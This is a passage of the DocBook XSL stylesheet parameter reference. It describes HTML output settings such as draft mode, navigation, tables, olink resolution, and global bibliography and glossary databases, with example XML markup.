name="entry.propagates.style" select="1"></xsl:param> - - - -Description - -If true, the role attribute of entry elements -will be passed through to the HTML as a class attribute on the -td or th generated for the table -cell. - - - - - - -html.longdesc -boolean - - -html.longdesc -Should longdesc URIs be created? - - - - -<xsl:param name="html.longdesc" select="1"></xsl:param> - - - -Description - -If non-zero, HTML files will be created for the -longdesc attribute. These files -are created from the textobjects in -mediaobjects and -inlinemediaobject. - - - - - - - -html.longdesc.link -boolean - - -html.longdesc.link -Should a link to the longdesc be included in the HTML? - - - - -<xsl:param name="html.longdesc.link" select="$html.longdesc"></xsl:param> - - - -Description - -If non-zero, links will be created to the -HTML files created for the -longdesc attribute. It makes no -sense to turn enable this option without also enabling the -$html.longdesc parameter. - -The longdesc.link named template is called -to construct the link. - - - - - - -make.valid.html -boolean - - -make.valid.html -Attempt to make sure the HTML output is valid HTML - - - - -<xsl:param name="make.valid.html" select="0"></xsl:param> - - - -Description - -If make.valid.html is true, the stylesheets take -extra effort to ensure that the resulting HTML is valid. This may mean that some -para tags are translated into HTML divs or -that other substitutions occur. - -This parameter is different from html.cleanup -because it changes the resulting markup; it does not use extension functions -to manipulate result-tree-fragments and is therefore applicable to any -XSLT processor. - - - - - - -html.cleanup -boolean - - -html.cleanup -Attempt to clean up the resulting HTML? - - - - -<xsl:param name="html.cleanup" select="1"></xsl:param> - - - -Description - -If non-zero, and if the EXSLT -extensions are supported by your processor, the resulting HTML will be -cleaned up. This improves the chances that the -resulting HTML will be valid. It may also improve the formatting of -some elements. - -This parameter is different from make.valid.html -because it uses extension functions to manipulate result-tree-fragments. - - - - - - -draft.mode -list - - -draft.mode -Select draft mode - - - - -<xsl:param name="draft.mode" select="'maybe'"></xsl:param> - - - -Description - -Selects draft mode. If draft.mode is -yes, the entire document will be treated -as a draft. If it is no, the entire document -will be treated as a final copy. If it is maybe, -individual sections will be treated as draft or final independently, depending -on how their status attribute is set. - - - - - - - -draft.watermark.image -uri - - -draft.watermark.image -The URI of the image to be used for draft watermarks - - - - -<xsl:param name="draft.watermark.image" select="'http://docbook.sourceforge.net/release/images/draft.png'"></xsl:param> - - - -Description - -The image to be used for draft watermarks. - - - - - - -generate.id.attributes - - - -generate.id.attributes - - - - - -<xsl:param name="generate.id.attributes" select="0"></xsl:param> - - - -Description - -If non-zero, the HTML stylesheet will generate ID attributes on -containers. For example, the markup: - -<section id="foo"><title>Some Title</title> -<para>Some para.</para> -</section> - -might produce: - -<div class="section" id="foo"> -<h2>Some Title</h2> -<p>Some para.</p> -</div> - -The alternative is to generate anchors: - -<div class="section"> -<h2><a name="foo"></a>Some Title</h2> -<p>Some para.</p> -</div> - -Because the name attribute of -the a element and the id -attribute of other tags are both of type ID, producing both -generates invalid documents. - -As of version 1.50, you can use this switch to control which type of -identifier is generated. For backwards-compatibility, generating -a anchors is preferred. - -Note: at present, this switch is incompletely implemented. -Disabling ID attributes will suppress them, but enabling ID attributes -will not suppress the anchors. - - - - - - -generate.meta.abstract -boolean - - -generate.meta.abstract -Generate HTML META element from abstract? - - - - -<xsl:param name="generate.meta.abstract" select="1"></xsl:param> - - - -Description - -If non-zero, document abstracts will be reproduced in the HTML -HEAD with meta name="description" content="...". - - - - - - -XSLT Processing - - -rootid -string - - -rootid -Specify the root element to format - - - -<xsl:param name="rootid" select="''"></xsl:param> - - -Description - -If rootid is specified, it must be the -value of an ID that occurs in the document being formatted. The entire -document will be loaded and parsed, but formatting will begin at the -element identified, rather than at the root. For example, this allows -you to process only chapter 4 of a book. -Because the entire document is available to the processor, automatic -numbering, cross references, and other dependencies are correctly -resolved. - - - - - - -suppress.navigation -boolean - - -suppress.navigation -Disable header and footer navigation - - - -<xsl:param name="suppress.navigation">0</xsl:param> - - -Description - - -If suppress.navigation is turned on, header and -footer navigation will be suppressed. - - - - - - -suppress.header.navigation -boolean - - -suppress.header.navigation -Disable header navigation - - - -<xsl:param name="suppress.header.navigation">0</xsl:param> - - -Description - - -If suppress.header.navigation is turned on, header -navigation will be suppressed. - - - - - - -suppress.footer.navigation -boolean - - -suppress.footer.navigation -Disable footer navigation - - - -<xsl:param name="suppress.footer.navigation">0</xsl:param> - - -Description - - -If suppress.footer.navigation is turned on, footer -navigation will be suppressed. - - - - - - -header.rule -boolean - - -header.rule -Rule under headers? - - - - -<xsl:param name="header.rule" select="1"></xsl:param> - - - -Description - -If non-zero, a rule will be drawn below the page headers. - - - - - - -footer.rule -boolean - - -footer.rule -Rule over footers? - - - - -<xsl:param name="footer.rule" select="1"></xsl:param> - - - -Description - -If non-zero, a rule will be drawn above the page footers. - - - - - - -Meta/*Info - - -inherit.keywords -boolean - - -inherit.keywords -Inherit keywords from ancestor elements? - - - -<xsl:param name="inherit.keywords" select="'1'"></xsl:param> - - -Description - -If inherit.keywords -is non-zero, the keyword META for each HTML -HEAD element will include all of the keywords from -ancestral elements. Otherwise, only the keywords from the current section -will be used. - - - - - - - -make.single.year.ranges -boolean - - -make.single.year.ranges -Print single-year ranges (e.g., 1998-1999) - - - -<xsl:param name="make.single.year.ranges" select="0"></xsl:param> - - -Description - -If non-zero, year ranges that span a single year will be printed -in range notation (1998-1999) instead of discrete notation -(1998, 1999). - - - - - - -make.year.ranges -boolean - - -make.year.ranges -Collate copyright years into ranges? - - - -<xsl:param name="make.year.ranges" select="0"></xsl:param> - - -Description - -If non-zero, copyright years will be collated into ranges. - - - - - - -author.othername.in.middle -boolean - - -author.othername.in.middle -Is othername in author a -middle name? - - - -<xsl:param name="author.othername.in.middle" select="1"></xsl:param> - - -Description - -If true (non-zero), the othername of an author -appears between the firstname and -surname. Otherwise, othername -is suppressed. - - - - - - - -generate.legalnotice.link -boolean - - -generate.legalnotice.link -TBD - - - -<xsl:param name="generate.legalnotice.link" select="0"></xsl:param> - - -Description - -TBD - - - - - - -Reference Pages - - -funcsynopsis.decoration -boolean - - -funcsynopsis.decoration -Decorate elements of a FuncSynopsis? - - - -<xsl:param name="funcsynopsis.decoration" select="1"></xsl:param> - - -Description - -If true (non-zero), elements of the FuncSynopsis will be decorated (e.g. bold or -italic). The decoration is controlled by functions that can be redefined -in a customization layer. - - - - - - - -funcsynopsis.style -list -ansi -kr - - -funcsynopsis.style -What style of 'FuncSynopsis' should be generated? - - - -<xsl:param name="funcsynopsis.style">kr</xsl:param> - - -Description - -If funcsynopsis.style is ansi, -ANSI-style function synopses are generated for a -funcsynopsis, otherwise K&R-style -function synopses are generated. - - - - - - - -funcsynopsis.tabular.threshold -integer - - -funcsynopsis.tabular.threshold -Width beyond which a tabular presentation will be used - - - - -<xsl:param name="funcsynopsis.tabular.threshold" select="40"></xsl:param> - - - -Description - -If funcsynopsis.tabular.threshold is greater than -zero then if a funcprototype is wider than the threshold -value, it will be presented in a table. - - - - - - -function.parens -boolean - - -function.parens -Generate parens after a function? - - - -<xsl:param name="function.parens">0</xsl:param> - - -Description - -If not 0, the formatting of -a function element will include -generated parenthesis. - - - - - - - -refentry.generate.name -boolean - - -refentry.generate.name -Output NAME header before 'RefName'(s)? - - - -<xsl:param name="refentry.generate.name" select="1"></xsl:param> - - -Description - -If true (non-zero), a "NAME" section title is output before the list -of 'RefName's. This parameter and -refentry.generate.title are mutually -exclusive. This means that if you change this parameter to zero, you -should set refentry.generate.title to 1 unless -you want get quite strange output. - - - - - - - -refentry.generate.title -boolean - - -refentry.generate.title -Output title before 'RefName'(s)? - - - - -<xsl:param name="refentry.generate.title" select="0"></xsl:param> - - - -Description - -If true (non-zero), the reference page title or first name is -output before the list of 'RefName's. This parameter and -refentry.generate.name are mutually exclusive. -This means that if you change this parameter to 1, you -should set refentry.generate.name to 0 unless -you want get quite strange output. - - - - - - - -refentry.xref.manvolnum -boolean - - -refentry.xref.manvolnum -Output manvolnum as part of -refentry cross-reference? - - - -<xsl:param name="refentry.xref.manvolnum" select="1"></xsl:param> - - -Description - -if true (non-zero), the manvolnum is used when cross-referencing -refentrys, either with xref -or citerefentry. - - - - - - - -citerefentry.link -boolean - - -citerefentry.link -Generate URL links when cross-referencing RefEntrys? - - - -<xsl:param name="citerefentry.link" select="'0'"></xsl:param> - - -Description - -If true, a web link will be generated, presumably -to an online man->HTML gateway. The text of the link is -generated by the generate.citerefentry.link template. - - - - - - - -refentry.separator -boolean - - -refentry.separator -Generate a separator between consecutive RefEntry elements? - - - -<xsl:param name="refentry.separator" select="'1'"></xsl:param> - - -Description - -If true, a separator will be generated between consecutive -reference pages. - - - - - - - -Tables - - -default.table.width -length - - -default.table.width -The default width of tables - - - -<xsl:param name="default.table.width" select="''"></xsl:param> - - -Description - -If specified, this value will be used for the WIDTH attribute on -tables that do not specify an alternate width (with the dbhtml processing -instruction). - - - - - - -nominal.table.width -length - - -nominal.table.width -The (absolute) nominal width of tables - - - -<xsl:param name="nominal.table.width" select="'6in'"></xsl:param> - - -Description - -In order to convert CALS column widths into HTML column widths, it -is sometimes necessary to have an absolute table width to use for conversion -of mixed absolute and relative widths. This value must be an absolute -length (not a percentag). - - - - - - -table.borders.with.css -boolean - - -table.borders.with.css -Use CSS to specify table, row, and cell borders? - - - - -<xsl:param name="table.borders.with.css" select="0"></xsl:param> - - - -Description - -If true (non-zero), CSS will be used to draw table borders. - - - - - - - -table.cell.border.style - - - -table.cell.border.style - - - - - -<xsl:param name="table.cell.border.style" select="'solid'"></xsl:param> - - - -Description - -FIXME: - - - - - - -table.cell.border.thickness - - - -table.cell.border.thickness - - - - - -<xsl:param name="table.cell.border.thickness" select="'0.5pt'"></xsl:param> - - - -Description - -FIXME: - - - - - - -table.cell.border.color - - - -table.cell.border.color - - - - - -<xsl:param name="table.cell.border.color" select="''"></xsl:param> - - - - -Description - -FIXME: - - - - - - -table.frame.border.style - - - -table.frame.border.style - - - - - -<xsl:param name="table.frame.border.style" select="'solid'"></xsl:param> - - - -Description - -FIXME: - - - - - - -table.frame.border.thickness - - - -table.frame.border.thickness -Specifies the thickness of the frame border - - - - -<xsl:param name="table.frame.border.thickness" select="'0.5pt'"></xsl:param> - - - -Description - -Specifies the thickness of the border on the table's frame. - - - - - - -table.frame.border.color - - - -table.frame.border.color - - - - - -<xsl:param name="table.frame.border.color" select="''"></xsl:param> - - - - -Description - -FIXME: - - - - - - -html.cellspacing -integer - - -html.cellspacing -Default value for cellspacing in HTML tables - - - - -<xsl:param name="html.cellspacing" select="''"></xsl:param> - - - -Description - -If specified, this value will be used as the default cellspacing value -in HTML tables. - - - - - - -html.cellpadding -integer - - -html.cellpadding -Default value for cellpadding in HTML tables - - - - -<xsl:param name="html.cellpadding" select="''"></xsl:param> - - - -Description - -If specified, this value will be used as the default cellpadding value -in HTML tables. - - - - - - -QAndASet - - -qanda.defaultlabel -boolean - - -qanda.defaultlabel -Sets the default for defaultlabel on QandASet. - - - -<xsl:param name="qanda.defaultlabel">number</xsl:param> - - -Description - -If no defaultlabel attribute is specified on a QandASet, this -value is used. It must be one of the legal values for the defaultlabel -attribute. - - - - - - - -qanda.inherit.numeration -boolean - - -qanda.inherit.numeration -Does enumeration of QandASet components inherit the numeration of parent elements? - - - -<xsl:param name="qanda.inherit.numeration" select="1"></xsl:param> - - -Description - -If true (non-zero), numbered QandADiv elements and Questions and Answers inherit -the numeration of the ancestors of the QandASet. - - - - - - - -Linking - - -target.database.document -uri - - -target.database.document -Name of master database file for resolving -olinks - - -<xsl:param name="target.database.document" select="''"></xsl:param> - - - -Description - -To resolve olinks between documents, the stylesheets use -a master database document that identifies the target datafiles for all the documents within the scope -of the olinks. This parameter value is the URI of -the master document to be read during processing to resolve olinks. -The default value is olinkdb.xml. -The data structure of the file is defined in the targetdatabase.dtd DTD. The database file provides the high level elements to record the identifiers, locations, and relationships of documents. The cross reference data for individual documents is generally pulled into the database using system entity references or XIncludes. See also targets.filename. - - - - - - - -targets.filename -string - - -targets.filename -Name of cross reference targets data file - - -<xsl:param name="targets.filename" select="'target.db'"></xsl:param> - - - -Description - -In order to resolve olinks efficiently, the stylesheets can -generate an external data file containing information about -all potential cross reference endpoints in a document. -This parameter lets you change the name of the generated -file from the default name target.db. -The name must agree with that used in the target database -used to resolve olinks during processing. -See also target.database.document. - - - - - - -collect.xref.targets -string - - -collect.xref.targets -Controls whether cross reference data is -collected - - -<xsl:param name="collect.xref.targets" select="'no'"></xsl:param> - - - -Description - -In order to resolve olinks efficiently, the stylesheets can -generate an external data file containing information about -all potential cross reference endpoints in a document. -This parameter determines whether the collection process is run when the document is processed by the stylesheet. The default value is no, which means the data file is not generated during processing. The other choices are yes, which means the data file is created and the document is processed for output, and only, which means the data file is created but the document is not processed for output. -See also targets.filename. - - - - - - -olink.base.uri -uri - - -olink.base.uri -Base URI used in olink hrefs - - -<xsl:param name="olink.base.uri" select="''"></xsl:param> - - -Description -When cross reference data is collected for resolving olinks, it may be necessary to prepend a base URI to each target's href. This parameter lets you set that base URI when cross reference data is collected. This feature is needed when you want to link to a document that is processed without chunking. The output filename for such a document is not known to the XSL stylesheet; the only target information consists of fragment identifiers such as #idref. To enable the resolution of olinks between documents, you should pass the name of the HTML output file as the value of this parameter. Then the hrefs recorded in the cross reference data collection look like outfile.html#idref, which can be reached as links from other documents. - - - - - -use.local.olink.style -boolean - - -use.local.olink.style -Process olinks using xref style of current -document - - -<xsl:param name="use.local.olink.style" select="0"></xsl:param> - - -Description -When cross reference data is collected for use by olinks, the data for each potential target includes one field containing a completely assembled cross reference string, as if it were an xref generated in that document. Other fields record the separate title, number, and element name of each target. When an olink is formed to a target from another document, the olink resolves to that preassembled string by default. If the use.local.olink.style parameter is set to non-zero, then instead the cross -reference string is formed again from the target title, number, and -element name, using the stylesheet processing the targeting document. -Then olinks will match the xref style in the targeting document -rather than in the target document. If both documents are processed -with the same stylesheet, then the results will be the same. - - - - - -current.docid -string - - -current.docid -targetdoc identifier for the document being -processed - - -<xsl:param name="current.docid" select="''"></xsl:param> - - -Description -When olinks between documents are resolved for HTML output, the stylesheet can compute the relative path between the current document and the target document. The stylesheet needs to know the targetdoc identifiers for both documents, as they appear in the target.database.document database file. This parameter passes to the stylesheet -the targetdoc identifier of the current document, since that -identifier does not appear in the document itself. -This parameter can also be used for print output. If an olink's targetdoc id differs from the current.docid, then the stylesheet can append the target document's title to the generated olink text. That identifies to the reader that the link is to a different document, not the current document. See also olink.doctitle to enable that feature. - - - - - -olink.doctitle -boolean - - -olink.doctitle -show the document title for external olinks? - - - -<xsl:param name="olink.doctitle" select="0"></xsl:param> - - -Description -When olinks between documents are resolved for print output, the generated text may not make it clear that the reference is to another document. It is possible for the stylesheets to append the other document's title to external olinks. For this to happen, two parameters must be set. The olink.doctitle parameter should be set to nonzero to enable this -feature. And you should set the current.docid parameter to the document id for the document currently -being processed for output. If an olink's targetdoc id differs from the current.docid, then the stylesheet can append the target document's -title to the generated olink text. - - - - - -link.mailto.url -string - - -link.mailto.url -Mailto URL for the LINK REL=made HTML HEAD element - - - -<xsl:param name="link.mailto.url"></xsl:param> - - -Description - -If not the empty string, this address will be used for the -REL=made LINK element in the HTML HEAD. - - - - - - - -ulink.target -string - - -ulink.target -The HTML anchor target for ULinks - - - -<xsl:param name="ulink.target" select="'_top'"></xsl:param> - - -Description - -If ulink.target is set, its value will -be used for the target attribute -on anchors generated for ulinks. - - - - - - -olink.fragid -string - - -olink.fragid -Names the fragment identifier portion of an OLink resolver query - - - -<xsl:param name="olink.fragid" select="'fragid='"></xsl:param> - - -Description - -FIXME: - - - - - - -olink.outline.ext -string - - -olink.outline.ext -The extension of OLink outline files - - - -<xsl:param name="olink.outline.ext" select="'.olink'"></xsl:param> - - -Description - -FIXME: - - - - - - -olink.pubid -string - - -olink.pubid -Names the public identifier portion of an OLink resolver query - - - -<xsl:param name="olink.pubid" select="'pubid='"></xsl:param> - - -Description - -FIXME: - - - - - - -olink.sysid -string - - -olink.sysid -Names the system identifier portion of an OLink resolver query - - - -<xsl:param name="olink.sysid" select="'sysid='"></xsl:param> - - -Description - -FIXME: - - - - - - -olink.resolver - - - -olink.resolver -The root name of the OLink resolver (usually a script) - - - -<xsl:param name="olink.resolver" select="'/cgi-bin/olink'"></xsl:param> - - -Description - -FIXME: - - - - - - -Bibliography - - -biblioentry.item.separator -string - - -biblioentry.item.separator -Text to separate bibliography entries - - - -<xsl:param name="biblioentry.item.separator">. </xsl:param> - - -Description - -Text to separate bibliography entries - - - - - - - -bibliography.collection -string - - -bibliography.collection -Name of the bibliography collection file - - - -<xsl:param name="bibliography.collection" select="'http://docbook.sourceforge.net/release/bibliography/bibliography.xml'"></xsl:param> - - -Description - -Maintaining bibliography entries across a set of documents is tedious, time -consuming, and error prone. It makes much more sense, usually, to store all of -the bibliography entries in a single place and simply extract -the ones you need in each document. - -That's the purpose of the -bibliography.collection parameter. To setup a global -bibliography database, follow these steps: - -First, create a stand-alone bibliography document that contains all of -the documents that you wish to reference. Make sure that each bibliography -entry (whether you use biblioentry or bibliomixed) -has an ID. - -My global bibliography, ~/bibliography.xml begins -like this: - - -<!DOCTYPE bibliography - PUBLIC "-//OASIS//DTD DocBook XML V4.1.2//EN" - "http://www.oasis-open.org/docbook/xml/4.1.2/docbookx.dtd"> -<bibliography><title>References</title> - -<bibliomixed id="xml-rec"><abbrev>XML 1.0</abbrev>Tim Bray, -Jean Paoli, C. M. Sperberg-McQueen, and Eve Maler, editors. -<citetitle><ulink url="http://www.w3.org/TR/REC-xml">Extensible Markup -Language (XML) 1.0 Second Edition</ulink></citetitle>. -World Wide Web Consortium, 2000. -</bibliomixed> - -<bibliomixed id="xml-names"><abbrev>Namespaces</abbrev>Tim Bray, -Dave Hollander, -and Andrew Layman, editors. -<citetitle><ulink url="http://www.w3.org/TR/REC-xml-names/">Namespaces in -XML</ulink></citetitle>. -World Wide Web Consortium, 1999. -</bibliomixed> - -<!-- ... --> -</bibliography> - - - -When you create a bibliography in your document, simply -provide empty bibliomixed -entries for each document that you wish to cite. Make sure that these -elements have the same ID as the corresponding real -entry in your global bibliography. - -For example: - - -<bibliography><title>Bibliography</title> - -<bibliomixed id="xml-rec"/> -<bibliomixed id="xml-names"/> -<bibliomixed id="DKnuth86">Donald E. Knuth. <citetitle>Computers and -Typesetting: Volume B, TeX: The Program</citetitle>. Addison-Wesley, -1986. ISBN 0-201-13437-3. -</bibliomixed> -<bibliomixed id="relaxng"/> - -</bibliography> - - -Note that it's perfectly acceptable to mix entries from your -global bibliography with normal entries. You can use -xref or other elements to cross-reference your -bibliography entries in exactly the same way you do now. - -Finally, when you are ready to format your document, simply set the -bibliography.collection parameter (in either a -customization layer or directly through your processor's interface) to -point to your global bibliography. - -The stylesheets will format the bibliography in your document as if -all of the entries referenced appeared there literally. - - - - - - -bibliography.numbered -boolean - - -bibliography.numbered -Should bibliography entries be numbered? - - - - -<xsl:param name="bibliography.numbered" select="0"></xsl:param> - - - -Description - -If non-zero bibliography entries will be numbered - - - - - - -Glossary - - -glossterm.auto.link -boolean - - -glossterm.auto.link -Generate links from glossterm to glossentry automaticaly? - - - - -<xsl:param name="glossterm.auto.link" select="0"></xsl:param> - - - -Description - -If true, a link will be automatically created from glossterm -to glossentry for that glossary term. This is usefull when your -glossterm names are consistent and you don't want to add links -manually. -If there is linkend on -glossterm then is used instead of autogeneration of -link. - - - - - - -firstterm.only.link -boolean - - -firstterm.only.link -Does automatic glossterm linking only apply to firstterms? - - - - -<xsl:param name="firstterm.only.link" select="0"></xsl:param> - - - -Description - -If true, only firstterms will be automatically linked -to the glossary. If glossary linking is not enabled, this parameter -has no effect. - - - - - - -glossary.collection -string - - -glossary.collection -Name of the glossary collection file - - - - -<xsl:param name="glossary.collection" select="''"></xsl:param> - - - -Description - -Glossaries maintained independently across a set of documents -are likely to become inconsistent unless considerable effort is -expended to keep them in sync. It makes much more sense, usually, to -store all of the glossary entries in a single place and simply -extract the ones you need in each document. - -That's the purpose of the -glossary.collection parameter. To setup a global -glossary database, follow these steps: - -Setting Up the Glossary Database - -First, create a stand-alone glossary document that contains all of -the entries that you wish to reference. Make sure that each glossary -entry has an ID. - -Here's an example glossary: - - - -<?xml version="1.0" encoding="utf-8"?> -<!DOCTYPE glossary - PUBLIC "-//OASIS//DTD DocBook XML V4.1.2//EN" - "http://www.oasis-open.org/docbook/xml/4.1.2/docbookx.dtd"> -<glossary> -<glossaryinfo> -<editor><firstname>Eric</firstname><surname>Raymond</surname></editor> -<title>Jargon File 4.2.3 (abridged)</title> -<releaseinfo>Just some test data</releaseinfo> -</glossaryinfo> - -<glossdiv><title>0</title> - -<glossentry> -<glossterm>0</glossterm> -<glossdef> -<para>Numeric zero, as opposed to the letter `O' (the 15th letter of -the English alphabet). In their unmodified forms they look a lot -alike, and various kluges invented to make them visually distinct have -compounded the confusion. If your zero is center-dotted and letter-O -is not, or if letter-O looks almost rectangular but zero looks more -like an American football stood on end (or the reverse), you're -probably looking at a modern character display (though the dotted zero -seems to have originated as an option on IBM 3270 controllers). If -your zero is slashed but letter-O is not, you're probably looking at -an old-style ASCII graphic set descended from the default typewheel on -the venerable ASR-33 Teletype (Scandinavians, for whom /O is a letter, -curse this arrangement). (Interestingly, the slashed zero long -predates computers; Florian Cajori's monumental "A History of -Mathematical Notations" notes that it was used in the twelfth and -thirteenth centuries.) If letter-O has a slash across it and the zero -does not, your display is tuned for a very old convention used at IBM -and a few other early mainframe makers (Scandinavians curse <emphasis>this</emphasis> -arrangement even more, because it means two of their letters collide). -Some Burroughs/Unisys equipment displays a zero with a <emphasis>reversed</emphasis> -slash. Old CDC computers rendered letter O as an unbroken oval and 0 -as an oval broken at upper right and lower left. And yet another -convention common on early line printers left zero unornamented but -added a tail or hook to the letter-O so that it resembled an inverted -Q or cursive capital letter-O (this was endorsed by a draft ANSI -standard for how to draw ASCII characters, but the final standard -changed the distinguisher to a tick-mark in the upper-left corner). -Are we sufficiently confused yet?</para> -</glossdef> -</glossentry> - -<glossentry> -<glossterm>1TBS</glossterm> -<glossdef> -<para role="accidence"> -<phrase role="pronounce"></phrase> -<phrase role="partsofspeach">n</phrase> -</para> -<para>The "One True Brace Style"</para> -<glossseealso>indent style</glossseealso> -</glossdef> -</glossentry> - -<!-- ... --> - -</glossdiv> - -<!-- ... --> - -</glossary> - - - - -Marking Up Glossary Terms - -That takes care of the glossary database, now you have to get the entries -into your document. Unlike bibliography entries, which can be empty, creating -placeholder glossary entries would be very tedious. So instead, -support for glossary.collection relies on implicit linking. - -In your source document, simply use firstterm and -glossterm to identify the terms you wish to have included -in the glossary. The stylesheets assume that you will either set the -baseform attribute correctly, or that the -content of the element exactly matches a term in your glossary. - -If you're using a glossary.collection, don't -make explicit links on the terms in your document. - -So, in your document, you might write things like this: - - -<para>This is dummy text, without any real meaning. -The point is simply to reference glossary terms like <glossterm>0</glossterm> -and the <firstterm baseform="1TBS">One True Brace Style (1TBS)</firstterm>. -The <glossterm>1TBS</glossterm>, as you can probably imagine, is a nearly -religious issue.</para> - - -If you set the firstterm.only.link parameter, -only the terms marked with firstterm will be links. -Otherwise, all the terms will be linked. - - - -Marking Up the Glossary - -The glossary itself has to be identified for the stylesheets. For lack -of a better choice, the role is used. -To identify the glossary as the target for automatic processing, set -the role to auto. The title of this -glossary (and any other information from the glossaryinfo -that's rendered by your stylesheet) will be displayed, but the entries will -come from the database. - - -Unfortunately, the glossary can't be empty, so you must put in -at least one glossentry. The content of this entry -is irrelevant, it will not be rendered: - - -<glossary role="auto"> -<glossentry> -<glossterm>Irrelevant</glossterm> -<glossdef> -<para>If you can see this, the document was processed incorrectly. Use -the <parameter>glossary.collection</parameter> parameter.</para> -</glossdef> -</glossentry> -</glossary> - - -What about glossary divisions? If your glossary database has glossary -divisions and your automatic glossary contains at least -one glossdiv, the automic glossary will have divisions. -If the glossdiv is missing from either location, no divisions -will be rendered. - -Glossary entries (and divisions, if appropriate) in the glossary will -occur in precisely the order they occur in your database. - - - -Formatting the Document - -Finally, when you are ready to format your document, simply set the -glossary.collection parameter (in either a -customization layer or directly through your processor's interface) to -point to your global glossary. - -The stylesheets will format the glossary in your document as if -all of the entries implicilty referenced appeared there literally. - - -Limitations - -Glossary cross-references within the glossary are -not supported. For example, this will not work: - - -<glossentry> -<glossterm>gloss-1</glossterm> -<glossdef><para>A description that references <glossterm>gloss-2</glossterm>.</para> -<glossseealso>gloss-2</glossseealso> -</glossdef> -</glossentry> - - -If you put glossary cross-references in your glossary that way, -you'll get the cryptic error: Warning: -glossary.collection specified, but there are 0 automatic -glossaries. - -Instead, you must do two things: - - - -Markup your glossary using glossseealso: - - -<glossentry> -<glossterm>gloss-1</glossterm> -<glossdef><para>A description that references <glossterm>gloss-2</glossterm>.</para> -<glossseealso>gloss-2</glossseealso> -</glossdef> -</glossentry> - - - - -Make sure there is at least one glossterm reference to -gloss-2 in your document. The -easiest way to do that is probably within a remark in your -automatic glossary: - - -<glossary role="auto"> -<remark>Make sure there's a reference to <glossterm>gloss-2</glossterm>.</remark> -<glossentry> -<glossterm>Irrelevant</glossterm> -<glossdef> -<para>If you can see this, the document was processed incorrectly. Use -the <parameter>glossary.collection</parameter> parameter.</para> -</glossdef> -</glossentry> -</glossary> - - - - - - - - - - -glossentry.show.acronym -list - - -glossentry.show.acronym -Display glossentry acronyms? - - - - -<xsl:param name="glossentry.show.acronym" select="'no'"></xsl:param> - - - -Description - -A setting of yes means they should be displayed; -no means they shouldn't. If primary is used, -then they are shown as the primary text for the entry. - - -This setting controls both acronym and -abbrev elements in the glossentry. - - - - - - - -Miscellaneous - - -formal.procedures -boolean - - -formal.procedures -Selects formal or informal procedures - - - - -<xsl:param name="formal.procedures" select="1"></xsl:param> - - - -Description - -Formal procedures are numbered and always have a title. - - - - - - - -formal.title.placement - - - -formal.title.placement - - - - - -<xsl:param name="formal.title.placement"> -figure before -example before -equation before -table before -procedure before -task before -</xsl:param> - - - -Description - -Specifies where formal object titles should occur. For each formal object -type (figure, -example, -equation, -table, and procedure) -you can specify either the keyword -before or -after. - - - - - - -runinhead.default.title.end.punct -string - - -runinhead.default.title.end.punct -Default punctuation character on a run-in-head - - - -<xsl:param name="runinhead.default.title.end.punct" select="'.'"></xsl:param> - - -Description - -FIXME: - - - - - - - -runinhead.title.end.punct -string - - -runinhead.title.end.punct -Characters that count as punctuation on a run-in-head - - - -<xsl:param name="runinhead.title.end.punct" select="'.!?:'"></xsl:param> - - -Description - -FIXME: - - - - - - - -show.comments -boolean - - -show.comments -Display comment elements? - - - -<xsl:param name="show.comments">1</xsl:param> - - -Description - -If true (non-zero), comments will be displayed, otherwise they are suppressed. -Comments here refers to the comment element, -which will be renamed remark in DocBook V4.0, -not XML comments (<-- like this -->) which are unavailable. - - - - - - - -show.revisionflag -boolean - - -show.revisionflag -Enable decoration of elements that have a revisionflag - - - -<xsl:param name="show.revisionflag">0</xsl:param> - - -Description - - -If show.revisionflag is turned on, then the stylesheets -may produce additional markup designed to allow a CSS stylesheet to -highlight elements that have specific revisionflag settings. - -The markup inserted will be usually be either a <span> or <div> -with an appropriate class attribute. (The value of -the class attribute will be the same as the value of the revisionflag -attribute). In some contexts, for example tables, where extra markup -would be structurally illegal, the class attribute will be added to the -appropriate container element. - -In general, the stylesheets only test for revisionflag in contexts -where an importing stylesheet would have to redefine whole templates. -Most of the revisionflag processing is expected to be done by another -stylesheet, for example changebars.xsl. - - - - - - -shade.verbatim -boolean - - -shade.verbatim -Should verbatim environments be shaded? - - - -<xsl:param name="shade.verbatim" select="0"></xsl:param> - - -Description - -FIXME: - - - - - - -shade.verbatim.style - - - -shade.verbatim.style -Properties that specify the style of shaded verbatim listings - - - - -<xsl:attribute-set name="shade.verbatim.style"> - <xsl:attribute name="border">0</xsl:attribute> - <xsl:attribute name="bgcolor">#E0E0E0</xsl:attribute> -</xsl:attribute-set> - - - - -Description - -FIXME: - - - - - - -punct.honorific -string - - -punct.honorific -Punctuation after an honorific in a personal name. - - - - -<xsl:param name="punct.honorific" select="'.'"></xsl:param> - - - -Description - -This parameter specifies the punctuation that should be added after an -honorific in a personal name. - - - - - - -segmentedlist.as.table -boolean - - -segmentedlist.as.table -Format segmented lists as tables? - - - - -<xsl:param name="segmentedlist.as.table" select="0"></xsl:param> - - - -Description - -If non-zero, segmentedlists will be formatted as -tables. - - - - - - -variablelist.as.table -boolean - - -variablelist.as.table -Format variablelists as tables? - - - - -<xsl:param name="variablelist.as.table" select="0"></xsl:param> - - - -Description - -If non-zero, variablelists will be formatted as -tables. - -This parameter only applys to the HTML transformations. In the -FO case, proper list markup is robust enough to handle the formatting. -But see also variablelist.as.blocks. - - - - - - -tex.math.in.alt -string - - -tex.math.in.alt -TeX notation used for equations - - - - -<xsl:param name="tex.math.in.alt" select="''"></xsl:param> - - - -Description - -If you want type math directly in TeX notation in equations, -this parameter specifies notation used. Currently are supported two -values -- plain and latex. Empty -value means that you are not using TeX math at all. - -Preferred way for including TeX alternative of math is inside of -textobject element. Eg.: - -<inlineequation> -<inlinemediaobject> -<imageobject> -<imagedata fileref="eq1.gif"/> -</imageobject> -<textobject><phrase>E=mc squared</phrase></textobject> -<textobject role="tex"><phrase>E=mc^2</phrase></textobject> -</inlinemediaobject> -</inlineequation> - -If you are using graphic element, you can -store TeX inside alt element: - -<inlineequation> -<alt role="tex">a^2+b^2=c^2</alt> -<graphic fileref="a2b2c2.gif"/> -</inlineequation> - -If you want use this feature, you should process your FO with -PassiveTeX, which only supports TeX math notation. When calling -stylsheet, don't forget to specify also -passivetex.extensions=1. - -If you want equations in HTML, just process generated file -tex-math-equations.tex by TeX or LaTeX. Then run -dvi2bitmap program on result DVI file. You will get images for -equations in your document. - - - - - - -tex.math.file -string - - -tex.math.file -Name of temporary file for generating images from equations - - - - -<xsl:param name="tex.math.file" select="'tex-math-equations.tex'"></xsl:param> - - - -Description - -Name of auxiliary file for TeX equations. This file can be -processed by 